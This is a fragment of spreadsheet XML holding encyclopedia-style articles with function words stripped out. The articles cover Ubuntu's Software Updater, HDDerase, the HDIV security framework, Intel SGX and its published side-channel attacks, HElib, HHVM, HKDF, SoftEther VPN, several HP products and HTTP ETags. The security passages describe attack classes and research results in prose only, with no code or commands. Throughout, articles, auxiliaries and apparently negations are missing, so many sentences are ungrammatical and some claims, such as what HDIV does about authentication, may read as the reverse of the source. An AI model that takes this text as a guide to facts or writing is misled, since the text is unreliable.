    <t>several linux operating systems, software updater (previously known update manager) program updates installed software associated packages important software updates security recommended patches. also informs users updates available, listing alphabetical order users choose updates install, any. originally written ubuntu, although part apt-based systems. application originally called update manager; announced 2012 starting ubuntu 12.10 name would change software updater better describe functions. technically rename done gui, name package containing application, executable internally software still uses name update-manager. software updater cannot uninstall updates, although accomplished package managers ubuntu software center technically advanced ones synaptic. ubuntu, software updater update operating system versions released every months standard releases every years long term support releases. this functionality included default desktop version needs added server version. distributions software updater kubuntu ubuntu ubuntu gnome ubuntu kylin ubuntu mate xubuntu zorin also advanced packaging tool kpackage package management system synaptic (software) ubuntu software center references external links launchpad development ubuntu wiki</t>
  </si>
  <si>
    <t>HDDerase</t>
  </si>
  <si>
    <t>hdderase freeware utility securely erases data hard drives using secure erase unit command built firmware parallel serial drives manufactured 2001. hdderase developed center magnetic recording research university california, diego. hdderase designed command-line only. differs file deletion programs darik's boot nuke attempt erase data using block writes cannot access certain portions hard drive. internal firmware secure erase command access data longer accessible software, blocks. also data erasure data remanence undeletion hiren's bootcd, contains hdderase 4.0, last known (2008) release. references external links secure erase research information download link</t>
  </si>
  <si>
    <t>HDIV</t>
  </si>
  <si>
    <t>hdiv application security framework controls information flow server client avoiding many important risks. hdiv extends applications behaviour adding security functionalities, maintaining framework specification. this implies hdiv used applications developed spring mvc, grails, jstl, struts struts javaserver faces, symfony transparent programmer without adding complexity application development. owasp (injection) injection flaws, injection occur malicious data sent interpreter part command query. attacker's malicious data tricks interpreter executing unintended commands used create, modify,access delete data without proper authorization. hdiv minimizes existence vulnerabilities thanks information flow control system avoids injection vulnerabilities. this architecture minimizes risk data generated legally editable form elements. important note even using prepared statements, long query based untrusted data generated previously server side (for instance identification item within list) possible exploit injection risk. hdiv also implements internal system detects injection risks within source-code. (broken authentication session management) application functions related authentication session management often implemented correctly. this allows attackers compromise passwords, keys, session tokens, exploit implementation flaws assume users' identities. hdiv create parallel authentication system delegating responsibility application servers. (xss) flaws occur whenever application takes untrusted data sends browser without proper validation escaping. allows attackers execute scripts victim's browser hijack user sessions, deface sites, redirect user malicious sites. hdiv minimizes existence untrusted data thanks information flow control system implement hdiv, minimizing risk data generated legally editable form elements. addition hdiv implements internal system detects risks within source-code. (insecure direct object reference) direct object reference occurs developer exposes reference internal implementation object, file, directory, database key. without access control check protection, attackers manipulate references access unauthorized data. source problem risk based manipulation updating data generated previously server side. instance list sent client item. client manipulated access forbidden hdiv information flow control system control data generated server side ensuring integrity data generated serve side. addition optionally possible ensure confidentiality data generated server side avoiding exposition critical (such credit cards, etc.). (security misconfiguration) good security requires secure configuration defined deployed application, frameworks, application server, server, database server, platform. secure settings defined, implemented, maintained, defaults often insecure. additionally, software kept date. current application security architectures follow security default approach, contrary, programmers must apply security configuration avoid access private confidential resources. thanks information flow control system implemented hdiv resources (links forms) exposed application controlled hdiv allow break original contract offered server. words, even programmer access control systems (java spring security) hdiv able know resource accessible user. (sensitive data exposure) many applications properly protect sensitive data, credit cards, ids, authentication credentials. attackers steal modify weakly protected data conduct credit card fraud, identity theft, crimes. sensitive data deserves extra protection encryption rest transit, well special precautions exchanged browser. hdiv offers confidentially property data generated server side. that say, hdiv replace original parameter values generated server side relative values (0,1,2,4, etc.) avoid exposing critical data client side. (missing function level access control) most applications verify function level access rights making functionality visible however, applications need perform access control checks server function accessed. requests verified, attackers able forge requests order access functionality without proper authorization. current application security architectures follow security default approach, contrary, programmers must apply security controls avoid access private confidential resources. thanks information flow control system implemented hdiv resources (links forms) exposed application controlled hdiv allow breaking original contract offered server. words, even programmer access control systems (java spring security) hdiv able know resource accessible user. (csrf) csrf attack forces logged-on victim's browser send forged http request, including victim's session cookie automatically included authentication information, vulnerable application. this allows attacker force victim's browser generate requests vulnerable application thinks legitimate requests victim. hdiv adds random tokens link form existing within application. makes extremely difficult implement csrf attack attacker know value. order offer extreme security level hdiv random token session creates token requested page. even token used links forms within page different avoiding reuse link tokens exploit form. token created data retrieval requests (get, head, trace options http methods) another data modification (post, patch, delete methods). (using components known vulnerabilities) components, libraries, frameworks, software modules, almost always full privileges. vulnerable component exploited, attack facilitate serious data loss server takeover. applications using components known vulnerabilities undermine application defenses enable range possible attacks impacts. although hdiv can't update base software applications advisable update software versions latest, information flow control system implemented hdiv avoid makes difficult exploit many known unknown vulnerabilities base software. words, many cases (see: struts cancel vulnerability), risks based unexpected application. hdiv allow break original contract thanks property difficult exploit existing risks. (unvalidated redirects forwards) applications frequently redirect forward users pages websites, untrusted data determine destination pages. without proper validation, attackers redirect victims phishing malware sites, forwards access unauthorized pages. this vulnerability mainly related manipulation readonly data data generated previously server side. hdiv controls data server server allow redirection malicious sites. also application security owasp resources securing grails applications burt beckwith (springsource) spring update hdiv integration rossen stoyanchev (springsource) spring form validation hdiv lucky ryan references external links official website</t>
  </si>
  <si>
    <t>Software Guard Extensions</t>
  </si>
  <si>
    <t>intel software guard extensions (sgx) security-related instruction codes built intel central processing units (cpus). they allow user-level operating system code define protected private regions memory, called enclaves. designed useful implementing secure remote computation, secure browsing, digital rights management (drm). other applications include concealment proprietary algorithms encryption keys.sgx involves encryption portion memory (the enclave). data code originating enclave decrypted within cpu, protecting examined read code, including code running higher privilege levels operating system underlying hypervisors. while mitigate many kinds attacks, protect side-channel attacks.a pivot intel 2021 resulted deprecation 11th 12th generation intel core processors, development continues intel xeon cloud enterprise use. details first introduced 2015 sixth generation intel core microprocessors based skylake microarchitecture. support indicated cpuid "structured extended feature leaf", availability applications requires bios/uefi support opt-in enabling reflected cpuid bits. this complicates feature detection logic applications.emulation added experimental version qemu system emulator 2014. 2015, researchers georgia institute technology released open-source simulator named "opensgx".one example used security demo application wolfssl using cryptography algorithms. intel goldmont plus (gemini lake) microarchitecture also contains support intel sgx.both 11th 12th generations intel core processors, listed "deprecated" thereby supported "client platform" processors. demonstrations sgx's vulnerability prime+probe attack march 2017 researchers austria's graz university technology developed proof-of-concept grab keys enclaves running system within five minutes using certain instructions lieu fine-grained timer exploit cache dram side-channels. countermeasure type attack presented published daniel gruss usenix security symposium 2017. among published countermeasures, countermeasure type attack published september 2017, compiler-based tool, dr.sgx, claims superior performance elimination implementation complexity proposed solutions. spectre-like attack lsds group imperial college london showed proof concept spectre speculative execution security vulnerability adapted attack secure enclave. foreshadow attack, disclosed august 2018, combines speculative execution buffer overflow bypass sgx. enclave attack february 2019, researchers austria's graz university technology published findings, showed cases possible malicious code within enclave itself. exploit involves scanning process memory, order reconstruct payload, code system. paper claims confidential protected nature enclave, impossible antivirus software detect remove malware residing within however, since modern anti-malware antivirus solutions monitor system calls, interaction application operating system, possible identify malicious enclaves behavior, issue unlikely concern state-of-the-art antiviruses. intel issued statement, stating attack outside threat model sgx, cannot guarantee code user comes trusted sources, urged consumers trusted code. microscope replay attack there proliferation side-channel attacks plaguing modern computer architectures. many attacks measure slight, nondeterministic variations execution code, attacker needs many, possibly tens thousands, measurements learn secrets. however, microscope attack allows malicious replay code arbitrary number times regardless programs actual structure, enabling dozens side-channel attacks. plundervolt security researchers able inject timing specific faults execution within enclave, resulting leakage information. attack executed remotely, requires access privileged control processor's voltage frequency. load value injection injects data program aiming replace value loaded memory used short time mistake spotted rolled back, controls data control flow. sgaxe sgaxe, vulnerability published 2020, extends speculative execution attack cache, leaking content enclave. this allows attacker access private keys used remote attestation. words, threat actor bypass intel's countermeasures breach enclaves' confidentiality. sgaxe attack carried extracting attestation keys sgx's private quoting enclave signed intel. attacker masquerade legitimate intel machines signing arbitrary attestation quotes. also intel spectre-ng trusted execution environment (tee) references external links intel software guard extensions (intel sgx) extensions, intel intel software guard extensions (intel sgx) programming reference, intel, october 2014 2015 tech chat: primer intel software guard extensions, intel (poster) isca 2015 tutorial slides intel sgx, intel, june 2015 mckeen, frank, (intel), innovative instructions software model isolated execution proceedings international workshop hardware architectural support security privacy. acm, 2013. jackson, alon, (phd dissertation). trust keys beholder: extending autonomy anonymity, 2017. joanna rutkowska, thoughts intel's upcoming software guard extensions (part august 2013 sgx: good, downright ugly shaun davenport, richard ford (florida institute technology) virus bulletin, 2014-01-07 victor costan srinivas devadas, intel explained, january 2016. wolfssl, october 2016. security intel protection data privacy applications professor yehuda lindell (bar ilan university unbound tech), january 2018 intel technology impact processor side-channel attacks, march 2020 confidential computing delivers personalised shopping experience, january 2021 realising potential data whilst preserving privacy conclave december 2021 introduction intel software guard extensions, june 2020</t>
  </si>
  <si>
    <t>HElib</t>
  </si>
  <si>
    <t>homomorphic encryption library helib free open-source cross platform software developed implements various forms homomorphic encryption. history helib primarily developed shai halevi victor shoup, shortly craig gentry researcher ibm, initial release 2013. features library implements i.a. brakerski-gentry-vaikuntanathan (bgv) homomorphic encryption scheme, well optimizations smart-vercauteren ciphertext packing techniques.helib written uses mathematical library. references</t>
  </si>
  <si>
    <t>HHVM</t>
  </si>
  <si>
    <t>hiphop virtual machine (hhvm) open-source virtual machine based just-in-time (jit) compilation serves execution engine hack programming language used support execution release hhvm version using principle compilation, hack code first transformed intermediate hiphop bytecode (hhbc), dynamically translated x86-64 machine code, optimized, natively executed. this contrasts php's usual interpreted execution, zend engine transforms source code opcodes serve form bytecode, executes opcodes directly zend engine's virtual cpu.hhvm developed meta, project's source code hosted github; licensed terms license zend license. overview hhvm created successor hiphop (hphpc) execution engine, php-to-c++ transpiler also created facebook. based gained experience aiming solve issues introduced hphpc, meta decided early 2010 create jit-based virtual machine. issues associated hphpc included reaching plateau performance improvements, lack full support features language, difficulties arising specific time- resource-consuming development deployment processes required projects used hphpc. 2013, production version facebook.com website stopped using hphpc switched hhvm. following compilation principle, hhvm first converts executed hack code high-level bytecode, hhbc, also known intermediate language. hhbc bytecode format created specifically hhvm, form appropriate consumption interpreters just-in-time compilers. next steps execution, hhvm dynamically ("just-in-time") translates hhbc bytecode x86-64 machine code, performs additional optimizations dynamic analysis translated bytecode, executes x86-64 machine code. result, hhvm certain similarities virtual machines used programming languages, including common language runtime (clr, language) java virtual machine (jvm, java language). hhvm brings many benefits comparison hphpc, almost complete support entire language defined official implementation version 5.4, including hhvm's support create_function() eval() constructs. furthermore, hhvm uses execution engine deployed production development environments, supporting integration execution engine hphpd debugger environment types; result, maintaining hphpi (hiphop interpreter) separately development utility longer needed case hphpc. hhvm also eliminates lengthy builds required hphpc programs, resulting much simpler development deployment processes case hphpc.together hhvm, meta also released hack, derivative allows programmers dynamic typing static typing, concept also known gradual typing, allows types specified function arguments, function return values, class properties; however, types local variables cannot specified. time, hack provide complete backward compatibility carrying features, goto statement dynamic variable names.in september 2017, announced version 3.24 would last version hhvm officially support php, hhvm support hack going forward, citing differences incompatibilities performance process virtual machine provides execution environment, hhvm ability live type information produce efficient native code, leading higher server throughput lower latency. 2012, execution facebook.com's source code hhvm achieved performance parity hphpc, december 2013 hphpc even surpassed around 15%. also llvm parrot virtual machine phalanger notes references external links official website</t>
  </si>
  <si>
    <t>HKDF</t>
  </si>
  <si>
    <t>hkdf simple derivation function (kdf) based hmac message authentication code. initially proposed authors building block various protocols applications, well discourage proliferation multiple mechanisms. main approach hkdf follows "extract-then-expand" paradigm, logically consists modules: first stage takes input keying material "extracts" fixed-length pseudorandom key, second stage "expands" several additional pseudorandom keys (the output kdf).it used, example, convert shared secrets exchanged diffie–hellman material suitable encryption, integrity checking authentication.it formally described 5869. authors also described algorithm companion paper 2010.nist sp800-56cr2 specifies parameterizable extract-then-expand scheme, noting rfc5869 hkdf version citing paper rationale recommendations' extract-and-expand mechanisms. there implementations hkdf java, javascript, perl, php, python, ruby, programming languages. mechanism hkdf extracts pseudorandom (prk) using hmac hash function (e.g. hmac-sha256) optional salt (acting key) potentially weak input material (ikm) (acting data). generates similarly cryptographically strong output material (okm) desired length repeatedly generating prk-keyed hash-blocks appending output material, finally truncating desired length. added security, prk-keyed hmac-hashed blocks chained generation appending previous hash block incrementing 8-bit counter optional context string middle hashed hmac generate current hash block.an important property hkdf amplify entropy allow large source weaker entropy utilised evenly effectively. uses hkdf primary potentially independent uses: "extract" (condense/blend) entropy larger random source provide uniformly unbiased higher entropy smaller output (e.g., encryption key). this done utilising diffusion properties cryptographic macs. "expand" generated output already reasonably random input existing shared larger cryptographically independent output, thereby producing multiple keys deterministically initial shared key, process produce secret keys safely multiple devices, long inputs utilised.these functions also combined used form prng improve random number generator's potentially-biased output, well protect analysis help defend random number generation malicious inputs. example: python implementation references</t>
  </si>
  <si>
    <t>SoftEther VPN</t>
  </si>
  <si>
    <t>softether free open-source, cross-platform, multi-protocol client server software, developed part daiyuu nobori's master's thesis research university tsukuba. protocols vpn, l2tp/ipsec, openvpn, microsoft secure socket tunneling protocol provided single server. released using gplv2 license january 2014. license switched apache license january 2019. softether supports traversal, making useful servers computers behind residential gateways, facility routers, firewalls. firewalls performing deep packet inspection unable detect softether's transport packets tunnel https used camouflage connection. softether optimizes performance using full ethernet frame utilization, reducing memory copy operations, parallel transmission, clustering. together, reduce latency normally associated connections increasing throughput. softether server unable bind specific addresses machine, negating biggest features. server running website cannot softether machine, thereby preventing using ssl-vpn tunnel functionality software famous for. interoperability softether server bridge windows, linux, 10.8, freebsd, solaris operating systems. softether client runs windows, linux, macos. softether server serves softether protocol, also serves openvpn, microsoft secure socket tunneling protocol (sstp), vpn, etherip, l2tpv3, ipsec. serves mobile devices running ios, android, windows phone l2tp/ipsec. clients endpoints supporting protocols also used; includes many routers cisco, juniper, linksys (with dd-wrt), asus, others. server softether server implements server function. listens accepts connections client bridge several protocols. server several virtual hubs virtual layer-3 switches. virtual full layer-2 ethernet packet-switching functions like physical ethernet switch. additionally, virtual configured define packet filter entries filter packets virtual hub. virtual layer-3 switch layer-3 static routing functions like physical router. server local bridges. local bridge layer-2 packet-switching fabric physical ethernet network-adapter virtual hub. administrator defines local bridge virtual existing corporate network build remote-access server site-to-site server. client softether client client program virtualized function ethernet network adapter. computer installed softether client establish connection server. since server support multiple protocols l2tp/ipsec ms-sstp vpn, users required install softether client client computers. when user uses l2tp/ipsec ms-sstp connect server, built-in client programs operating system used establish server. however, softether client advanced functions (e.g. detailed communication settings) built-in clients. exploit full performance softether server, recommended install softether client client computer. bridge softether bridge program building site-to-site vpn. build site-to-site network, system administrator install softether server central site, install softether bridge remote sites. bridge connects central server cascade connection. cascade connection similar virtualization uplink connection (cross-cable connection) physical ethernet switches. server manager windows tool administrative tool softether server softether bridge. program runs windows linux wine. system administrator installs tool laptop makes connect remote server bridge administration. connection made session, management commands transported ssl. command-line admin utility vpncmd administrative tool softether server, client bridge. program runs consoles every supported operating systems. when user unable windows linux wine, user alternatively vpncmd manage programs. vpncmd also useful execute batch operation, creating many users virtual hub, creating many virtual hubs server. architecture some parts architecture softether different typical traditional ipsec-based systems. virtual virtual software-emulated virtual ethernet switch. learns maintains forwarding-database table inside. while traditional physical ethernet switches implement function hardware, softether implements function software. server several virtual hubs. each virtual isolated. virtual performs packet-switching concurrently connected sessions realize communication clients bridges. when several virtual hubs single instance server, virtual hubs isolated security. each different administrator delegated privilege correspondent virtual hub. administrator virtual define user-objects acls, limited delegated virtual hub. virtual network adapter virtual network adapter software-emulated virtual ethernet adapter. client create several virtual network adapters client computer. user establish session virtual network adapter destination virtual remote server. while session established, user communicate remote network virtual network adapter. since virtual network adapter works physical one, applications operating system components used without modification. virtual layer-3 switch virtual layer-3 switch software-emulated virtual router. several virtual layer-3 switches created single server instance. virtual layer-3 switch virtual interfaces connected virtual hubs. also several static routing table entries. virtual layer-3 switch useful make large-scale site-to-site network. although easy make site-to-site network build layer-2 bridging based vpn, number computers huge number broadcasting packets increase load inter-site links. prevent scaling problem, administrator isolates networks virtual layer-3 switch. cascade connection virtual hubs administrator define cascade connection local remote virtual hubs. after cascade connection established, originally-isolated ethernet segments combined single ethernet segment. therefore, cascade connection function used build site-to-site layer-2 ethernet bridging. local bridge virtual hubs physical ethernet segment since virtual hubs virtual network adapters software-emulated virtual ethernet devices, ethernet packets virtual devices cannot communicate physical ethernet devices. therefore, bridge virtual physical necessary build remote-access site-to-site vpn. make bridge, local bridge function exchanges ethernet packets virtual physical ethernet network adapter combine isolated ethernet segments single ethernet segment. after defining local bridge softether server, client connect server communicate existing ethernet devices (e.g. servers network equipment) local bridge. this called remote-access vpn. network administrator sets remote-site bridge, defines local bridges server bridge, defines cascade connection server bridge, remote ethernet segments connected directly layer-2 ethernet level. this called site-to-site vpn. firewall, proxy, transparency features softether transparency firewalls, proxy servers, nats (network address translators). this, softether supports ssl-vpn traversal. softether uses https protocol order establish tunnel. https (http ssl) protocol uses tcp/ip port (may vary) destination. parallel transmission mechanism multiple ssl-vpn tunnels when user chooses ssl-vpn protocol client server, softether server client parallel transmission mechanism improve throughput ssl-vpn tunnel. user number concurrent parallel transmission channels environment slow delaying network, performance tuning result faster throughput. when function enabled, logical session consist several (https) connections. packets added appropriate connections calculations optimizing modules. packet losses detected connection logical session, packet another healthy connection. this fast-switching optimization determine processing connection enables high throughput. traversal traditional systems require user firewall's administrator company open endpoint (tcp port) firewall border company internet. order reduce necessity open endpoint firewall, softether server traversal function. traversal enabled default. long enabled, softether client computers connect server behind firewall nat. special settings firewall necessary. icmp, very-restricted networks permit pass icmp packets. network, filtered. only icmp permitted. order make possible establish softether client-server session very-restricted network, softether "vpn icmp" "vpn dns" function. this function powerful penetrate restricted firewall. packets encapsulated icmp packets transmit firewall. receiver-side endpoint extracts inner packet capsuled packet. this useful exploiting public wi-fi. some public wi-fi pass icmp packets. they filter packets. server installed home office advance going outdoors, enjoy protocol-free network communication using restricted network. gate gate plugin softether vpn, allows users connect free servers, volunteers softether host servers. volunteers personal computers "servers". gate sponsored university tsukuba. also openvpn, open-source program hole punching, technique establishing "connections" firewalled/nated network nodes secure socket tunneling protocol (sstp) microsoft method implementing references external links official website gate</t>
  </si>
  <si>
    <t>HP Data Protector</t>
  </si>
  <si>
    <t>data protector software (originally omniback) automated backup recovery software single-server enterprise environments, supporting disk storage tape storage targets. provides cross-platform, online backup data microsoft windows, unix, linux operating systems. last version omniback name version 4.1, retired 2004. history when hewlett-packard acquired apollo computer 1989, latter already developed backup system entitled "omniback network backup system," available market time. continued develop product "omniback" name purpose backing individual files disk partitions. related distinct product "omniback/turbo" developed backing databases.in 1996 released omniback merged omniback omniback/turbo single product, although still impossible create single would contain database file system backup. offered $3,800. windows port released version 2.3. version 2.55 released 1997 included support hp-ux aix.in interim, hewlett-packard withdrew development slovenia germany. significant time spent delivering version 3.5.2 solaris. once complete however, allowed quick ports tru64 linux. with version 5.0, omniback name dropped. since then, product called openview storage data protector storageworks data protector, commonly data protector. announced release data protector part adaptive backup recovery initiative) 2014. released july 2014 along companion products: data protector management pack backup navigator.since micro focus acquired software 2017, named micro focus data protector. references external links micro focus data protector webpage</t>
  </si>
  <si>
    <t>HP Integrity Virtual Machines</t>
  </si>
  <si>
    <t>integrity virtual machines software hewlett-packard allows multiple virtual machines concurrently itanium server running hp-ux, notably integrity servers line. part hp's virtual server environment suite. product optimized server use. history christophe dinechin initiated skunkworks project virtualize itanium, help jean-marc chevrot "virtual team" experienced engineers. prototype integrity virtual machines developed 2000 2003 christophe dinechin, todd kjos jonathan ross. turned full-fledged product larger team experienced openvms, tru64 unix hp-ux kernel engineers. version 1.2, released 2005, hp-ux virtual machines. version 2.0, released november 2006, additionally supports windows server 2003, burners, tape drives vlan. version 3.0, released june 2007, supports linux enterprise linux version 3.5, released late 2007, supports suse linux enterprise server, hp-ux guests, service packs windows linux guests, accelerated virtual hp-ux guests, enabling better performance larger number devices. version 4.0, released september 2008, runs hp-ux 11.31 (also known v3), supports virtual cpus, capped allocation addition entitlement previous releases), additional support accelerated virtual (avio), performance analysis tool. version also includes beta functionality on-line migration support openvms guests. version 4.1, released april 2009, supports online migration allows customers migrate active guests host another host without service interruption. also provides support third-party alternatives secure communications, accelerated virtual (avio) networking windows linux guests, support ignite vxvm backing stores. version 4.2, released march 2010, supports encryption migration, brings support newer itanium hardware guest versions, contains software allowing serviceguard packages serviceguard nodes, support automatic memory reallocation. also added support openvms guests. version 4.2.5, released september 2010, brings support integrity superdome well suspend resume support version 4.3, released march 2011, brings support intel® itanium® tukwila processor, nvram edit utility, virtual remote console, virtual cpus guests, 128gb guest memory, avio storage devices, support fiber channel ethernet, support backing stores. version 6.1, released march 2012 brings support management vpar, direct input output (dio) feature improved functionality, manageability performance. version 6.3, released march 2014 emulate nvram, supports cpus 256gb guests, supports dynamic addition devices, supports migration processors. version 6.3.5, released march 2015 enables dynamic deletion devices, improvements physical ports npiv guests they're migrated, reduced memory overhead large vms, more. capabilities exact specifications depend precise version system configuration. host configurations supported hp-ux, include physical cores main memory. more guests concurrently, although optimal number generally lower, depending host memory processor configuration. guests multiple virtual cpus, maximum number supported configurations releases 4.0, release 4.0, release 4.3, 6.3. guests configured 256gb memory version 6.3. recent releases, memory adjusted dynamically hp-ux guests. virtual devices added removed dynamically. number virtual devices allowed supported configurations depends release. versions support accelerated virtual i/os used. allocation virtual machines adjusted dynamically granularity mhz. time allocated fair-share scheduler, delivers better utilization guests simplistic gang scheduler. user interface integrity virtual machines created managed using command-line interface graphical user interface accessed using browser. essential commands include: hpvmcreate create virtual machines hpvmstatus display status information hpvmstart hpvmstop start stop virtual machines hpvmmodify modify existing virtual machines hpvmconsole simulate hardware console hpvmmigrate perform on-line off-line guest migration hpvmsar show performance information running guests. hpvmsuspend hpvmresume suspend resume virtual machinesthe user interface integrated integrity virtual machines manager. also comparison platform virtualization software references external links product description hewlett-packard architecture overview white papers hpvm release note version</t>
  </si>
  <si>
    <t>HP MediaSmart Server</t>
  </si>
  <si>
    <t>mediasmart server home server hewlett-packard microsoft's windows home server operating system. models ex470 ex475 october 2008, mediasmart server sold models, ex470 (rrp us$599) ex475 (rrp us$749). they feature sempron 3400+ processor, gigabit ethernet port, four internal sata drive bays, four ports esata port. models identical exception amount included storage: ex470 hard drive preinstalled, ex475 hard drives preinstalled. hackers enthusiasts modded ex470 adding monitor, upgrading memory upgrading processor le-1640. ex485 ex487 december 2008, announced models, ex485 ex487, available pre-orders starting january 2009. newer models include support apple's time machine backup software. they also intel celeron processor, replacing sempron models. other features include revamped user interface larger preinstalled hard drives (one drive ex485; drives ex487). lx195 april 2009, announced mediasmart server lx195 intended low-cost entry home server market. model featured single internal drive, intel atom processor, ddr2 memory, gigabit ethernet, four ports storage expansion. software features included lx195 initial launch features ex485/ex487 server ex490 ex495 september 2009, launched mediasmart servers. ex490 comes hard disk storage costs $549, ex495 comes costs $699 7200 rpm. comes intel celeron processor intel pentium processor dual core ghz.on november 2010, windows home server team microsoft confirmed rumors would offering hardware next version windows home server (codenamed "vail"), would stop selling mediasmart servers altogether calendar year 2010. also mediasmart connect mediasmart references external links hp's mediasmart server site official mediasmart server community forums useful add-ins mediasmart server mediasmart server enthusiast community</t>
  </si>
  <si>
    <t>HP Neoview</t>
  </si>
  <si>
    <t>neoview data warehouse business intelligence computer server line based hewlett packard nonstop line. acted database server, providing nonstop nonstop sql, lacked transaction processing functionality original nonstop systems. line retired, longer marketed, january 2011. references</t>
  </si>
  <si>
    <t>HP Serviceguard</t>
  </si>
  <si>
    <t>serviceguard, formerly known mc/serviceguard, high-availability cluster software produced runs hp-ux linux. serviceguard existed since 1990, claims first high availability solution unix. linux port called sg/lx existed since 1999, briefly suspended reintroduced june 2012. references</t>
  </si>
  <si>
    <t>HP Virtual Connect</t>
  </si>
  <si>
    <t>virtual connect brings virtualization blade server edge. picks virtual machine technology stops. virtual machine technology move workloads across virtual machines single server. becomes challenge moving virtual machines physical machine another data center locations changes environments require manual intervention network storage administrators. pooling sharing multiple network connections across multiple servers virtual machines, virtual connect extends data center capability allowing physical setup movement virtual machine workloads servers virtual machines, transparently infrastructure. another name virtual connect powerconnect switches (the name series). virtual connect virtualization technology hewlett-packard (hp) de-couples fixed blade server adapter network addresses associated external networks changes blade server infrastructure environments don’t require complex choreography among server, lan, teams every task. using built-in virtual connect manager small configurations virtual connect enterprise manager larger environments, administrators define server connection profile blade server server installed. this profile establishes media access control (mac) addresses network interface controllers (nics), world wide names (wwns) host adapters (hbas), fibre channel boot parameters along associated network uplink connections associates blade server even server changed, configuration connection profile stays constant. when server takes place, profile associated used server. technology behind latest virtual connect flexfabric adapters modules, part flexnetwork architecture, takes virtual connect unique capabilities. virtual connect flexfabric provides four physical functions blade server adapter network port, unique ability fine-tune bandwidth adapt virtual server workload demands fly. four connections hardware personalities defined system administrator flexnics support ethernet traffic virtual connect. addition, however, physical functions also defined flexhba fibre channel protocol support iscsi initiator iscsi boot protocol support. each function percent hardware-level performance provides performance needed take full advantage multi-core processors support virtual machines physical server. each server support many connections—up half-height blade—with less investment expensive adapter cards server, fewer interconnect modules blade enclosure fewer expensive uplink switch ports corporate network. virtual connect technology foundations cloudsystem converged infrastructure allows abstraction blade server infrastructure infrastructure. this allows resources allocated services dynamic cloud environment. references</t>
  </si>
  <si>
    <t>SoftEther Corporation</t>
  </si>
  <si>
    <t>softether corporation japanese software company. founded industry-academia-government venture april 2004 university tsukuba students, goal develop software name, softether vpn. name indicated software emulates ethernet. related software softether software called softether (softether 1.0) written daiyu nobori, became representative director chairman company. 2003, software's development adopted projects exploratory youth program, sponsored information technology promotion agency, japan. addition highly evaluated project manager, million downloads three months making available website."the first softether sales version released august 2004 called softether mitsubishi materials corporation, japan. packetix second version software, released december 2005, name software changed packetix softether 2.0. 2006, packetix "software year" award information-technology promotion agency. 2010 march, packetix released softether corporation. some functions added version examples: support ipv6, 802.1q vlan, 1.0). this version compatible packetix 2.0.in 2013 july, packetix released softether corporation. version, existent protocols support added. ut-vpn 2010 june, ut-vpn released softether corporation university tsukuba. ut-vpn open source software. ut-vpn compatible packetix products softether corporation. ut-vpn developed based packetix 3.0, functions deleted. example, radius client supported packetix server, supported ut-vpn server. softether 2013 july, softether released softether project softether corporation university tsukuba. softether developed based packetix 4.0. compatibility restrictions functions follow ut-vpn. scheduled release source codes general public license (gpl) 2013.on january 2014, softether announced source code softether released open-source software gplv2 license. softether underlying engine gate. external links softether corporationofficial website (japanese) official website (chinese)external project (with university tsukuba)ut-vpn open source project (japanese) softether project (english) gate academic experiment project (english) also softether ut-vpn references</t>
  </si>
  <si>
    <t>HTTP ETag</t>
  </si>
  <si>
    <t>etag entity part http, protocol world wide web. several mechanisms http provides cache validation, allows client make conditional requests. this mechanism allows caches efficient saves bandwidth, server need send full response content changed. etags also used optimistic concurrency control help prevent simultaneous updates resource overwriting other. etag opaque identifier assigned server specific version resource found url. resource representation ever changes, different etag assigned. used manner, etags similar fingerprints quickly compared determine whether representations resource same. etag generation etags http header optional (not mandatory fields http header). method etags generated never specified http specification. common methods etag generation include using collision-resistant hash function resource's content, hash last modification timestamp, even revision number. order avoid stale cache data, methods used generate etags guarantee much practical) etag unique. however, etag-generation function could judged "usable", proven (mathematically) duplication etags would "acceptably rare", even could would occur. rfc-7232 explicitly states etags content-coding aware, e.g. etag: "123-a" content-encoding etag: "123-b" content-encoding: gzip some earlier checksum functions weaker crc32 crc64 known suffer hash collision problems. thus good candidates etag generation. strong weak validation etag mechanism supports strong validation weak validation. they distinguished presence initial "w/" etag identifier, "123456789" strong etag validator w/"123456789" weak etag validator strongly validating etag match indicates content resource representations byte-for-byte identical entity fields (such content-language) also unchanged. strong etags permit caching reassembly partial responses, byte-range requests. weakly validating etag match indicates representations semantically equivalent, meaning practical purposes interchangeable cached copies used. however, resource representations necessarily byte-for-byte identical, thus weak etags suitable byte-range requests. weak etags useful cases strong etags impractical server generate, dynamically generated content. typical usage typical usage, retrieved, server return resource's current representation along corresponding etag value, placed http response header "etag" field: etag: "686897696a7c876b7e" client decide cache representation, along etag. later, client wants retrieve resource again, first determine whether locally cached version expired (through cache-control expire headers). expired, retrieve locally cached resource. determined expired stale), client send request server includes previously saved copy etag "if-none-match" field. if-none-match: "686897696a7c876b7e" subsequent request, server compare client's etag etag current version resource. etag values match, meaning resource changed, server send back short response http modified status. status tells client cached version still good that. however, etag values match, meaning resource likely changed, full response including resource's content returned, etags used. case, client decide replace previously cached version newly returned representation resource etag. etag values used page monitoring systems. efficient page monitoring hindered fact websites etag headers pages. when monitor hints whether content changed, content retrieved analyzed using computing resources publisher subscriber. mismatched etag detection buggy website times fail update etag semantic resource updated. 2019, example prominent site export.arxiv.org. result, incorrectly returned response status 304, client fails retrieve updated resource. detect buggy website: cache response etag, assuming etag response aborted. subsequent request would've included if-none-match header, send header perhaps random probability. with probability, response returns altered content etag previously cached, mark website buggy disable etag caching reminder, strong etag, content comparison byte-for-byte, whereas, weak etag, would check semantic equivalence only. tracking using etags etags used track unique users, http cookies increasingly deleted privacy-aware users. july 2011, ashkan soltani team researchers berkeley reported number websites, including hulu, using etags tracking purposes. hulu kissmetrics ceased "respawning" july 2011, kissmetrics clients facing class-action lawsuit "undeletable" tracking cookies partially involving etags.because etags cached browser returned subsequent requests resource, tracking server simply repeat etag received browser ensure assigned etag persists indefinitely similar persistent cookies). additional caching headers also enhance preservation etag data.etags flushable clearing browser cache (implementations vary). references external links apache http server documentation fileetag directive editing web: detecting lost update problem using unreserved checkout, note, 1999. live demo zombie cookie using etags squid development projects etag support (completed 2001) using etags reduce bandwidth workload spring hibernate</t>
  </si>
  <si>
    <t>HTTP parameter pollution</t>
  </si>
  <si>
